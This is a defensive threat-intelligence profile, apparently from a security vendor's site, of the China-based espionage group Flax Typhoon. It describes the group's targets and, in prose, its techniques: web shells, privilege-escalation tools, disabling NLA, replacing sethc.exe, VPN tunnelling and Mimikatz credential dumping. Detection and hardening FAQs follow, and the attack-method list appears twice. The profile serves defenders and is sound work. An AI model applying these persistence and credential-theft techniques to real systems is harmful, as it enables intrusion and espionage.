Flax Typhoon
Flax Typhoon is a China-based cyber-espionage group that infiltrates organizations by exploiting public-facing services and using legitimate software to maintain stealthy, long-term access without relying on traditional malware.
The Origin of Flax Typhoon
Flax Typhoon is a China-based nation-state activity group that Microsoft has tracked since mid-2021. The actor focuses on long-term access and espionage, operating with minimal bespoke malware. Instead the group relies heavily on living-off-the-land binaries, legitimate third-party software, web shells, and hands-on-keyboard activity to quietly maintain presence in target networks. Microsoft attributes a campaign primarily against organizations in Taiwan to this group, though activity has been observed elsewhere.
Countries targeted by Flax Typhoon
The activity is concentrated in Taiwan, with some victims in Southeast Asia, North America, and Africa. The tooling and techniques are reusable and could be applied outside the region.
Industries targeted by Flax Typhoon
Flax Typhoon has primarily targeted government agencies, education, critical manufacturing, and information technology organizations. The campaign appears collection-oriented rather than disruptive, consistent with espionage objectives.
Flax Typhoon's Victims
Microsoft reported dozens of affected organizations; victims include internet-facing servers, VPN gateways, and servers running web, Java, and SQL services. Initial access commonly leverages public-facing services and web shells.
Flax Typhoon's Attack Method
Exploits known vulnerabilities in public-facing applications and services to deploy web shells such as China Chopper.
Uses public open-source privilege-escalation tools (Juicy Potato, BadPotato and variants) and known vulnerability exploits to elevate privileges on compromised hosts.
Establishes long-term access by enabling RDP persistence, disabling Network Level Authentication (NLA), replacing accessibility binaries (Sticky Keys/sethc.exe), and installing/configuring a VPN client to tunnel traffic to actor infrastructure. Operates with legitimate accounts, uses LOLBins and signed system binaries (certutil, bitsadmin, etc.), and avoids heavy malware to reduce detection.
Dumps credentials and memory from LSASS using tools like Mimikatz and other credential-dumping techniques.
Uses the established VPN tunnels and legitimate remote services to scan networks and move laterally.
Leverages built-in utilities and remote services to probe and access other systems.
Executes commands and lightweight tools interactively, collects credentials and configuration information, and stages data for exfiltration via established tunnels or proxying hosts.
Microsoft did not observe broad destructive actions in this campaign; the activity appears focused on stealthy access and collection rather than sabotage.
Exploits known vulnerabilities in public-facing applications and services to deploy web shells such as China Chopper.
Uses public open-source privilege-escalation tools (Juicy Potato, BadPotato and variants) and known vulnerability exploits to elevate privileges on compromised hosts.
Establishes long-term access by enabling RDP persistence, disabling Network Level Authentication (NLA), replacing accessibility binaries (Sticky Keys/sethc.exe), and installing/configuring a VPN client to tunnel traffic to actor infrastructure. Operates with legitimate accounts, uses LOLBins and signed system binaries (certutil, bitsadmin, etc.), and avoids heavy malware to reduce detection.
Dumps credentials and memory from LSASS using tools like Mimikatz and other credential-dumping techniques.
Uses the established VPN tunnels and legitimate remote services to scan networks and move laterally.
Leverages built-in utilities and remote services to probe and access other systems.
Executes commands and lightweight tools interactively, collects credentials and configuration information, and stages data for exfiltration via established tunnels or proxying hosts.
Microsoft did not observe broad destructive actions in this campaign; the activity appears focused on stealthy access and collection rather than sabotage.
TTPs Used by Flax Typhoon
How to Detect Flax Typhoon with Vectra AI
FAQs
Is Flax Typhoon destructive ransomware or espionage-focused?
Microsoft observed espionage-style activity focused on long-term access and credential collection, not destructive ransomware.
What makes detection difficult for this actor?
Heavy use of legitimate tools, system binaries, and valid accounts reduces signature detections and increases false negatives; behavioral detection and correlation are required.
Which artifacts should be high priority when triaging a suspected compromise?
Web shell files on public servers, registry changes disabling NLA, accessibility binary replacements (sethc.exe), SoftEther VPN processes under atypical accounts, and LSASS dumps.
Are there published hunting queries or detection rules to use?
Yes, Microsoft published Microsoft 365 Defender and Sentinel hunting queries and example detections, including KQL examples and TI mapping. Use them as a baseline and adapt to your telemetry.
Should we block the IPs Microsoft listed?
Block or sinkhole known malicious infrastructure where operationally feasible, but treat IPs as ephemeral. Combine IP blocks with behavioral detections for lasting coverage.
How to prioritize remediation after detection?
Immediately isolate and investigate compromised hosts, reset impacted accounts, rebuild internet-facing servers where web shells are found, and perform credential rotations.
What telemetry is most valuable for detecting this group?
Process creation and command line telemetry on endpoints, network connections to unusual external endpoints, web server file modifications and HTTP logs, and EDR traces of LSASS access.
Do standard AV products detect their tooling?
Some tooling (Mimikatz, known backdoors) is detected by AV, but much of Flax Typhoon’s activity uses LOLBins and legitimate tools; rely on EDR behavioral detections and correlation for coverage.
Any quick hardening checklist?
Patch public services, enforce MFA, reenable NLA, restrict RDP and VPN access via conditional access or jump hosts, enable LSASS protections, and monitor for certutil/bitsadmin usage.
Where can I get the official details, hunting queries, and IOCs?
Microsoft’s blog post contains the full analysis, hunting queries (KQL).